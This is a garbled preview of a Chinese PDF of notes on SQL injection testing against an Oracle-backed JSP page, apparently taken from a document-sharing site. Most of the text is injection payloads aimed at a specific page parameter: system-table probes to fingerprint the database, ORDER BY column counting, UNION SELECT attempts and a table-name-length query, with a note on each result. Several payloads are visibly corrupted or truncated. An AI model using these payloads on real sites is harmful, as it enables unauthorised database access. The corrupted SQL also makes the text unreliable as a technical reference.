Oracle数据库注入测试与分析.pdfVIP

  • 0
  • 0
  • 约8.24千字
  • 约 8页
  • 2026-06-29 发布于北京
  • 举报

1web/cxview.jsp?id=14499支持注释--不支持;

2and(selectcount(1)fromsysobjects)%3E0and1=1出错,基本判断是Oracle数据库3

__

web/cxview.jsp?id=14499and(selectcount(tablename)fromusertab)%3E0and1=1

显示正常,确定是Oracle数据库。

orderby1正常,orderby2出错,只有一个字段。

但是郁闷是。。。

并且1=2unionselectnullfromdual出错

unionallselectnullfromdual‑‑同样出错,可能不存在dual

andest(select*fromdual)出错

selectlength(cou_

判断表的字符长度:and(nt(*))fromusertab)=2and1=1如,10条就是两

位=2

文档评论(0)

1亿VIP精品文档

相关文档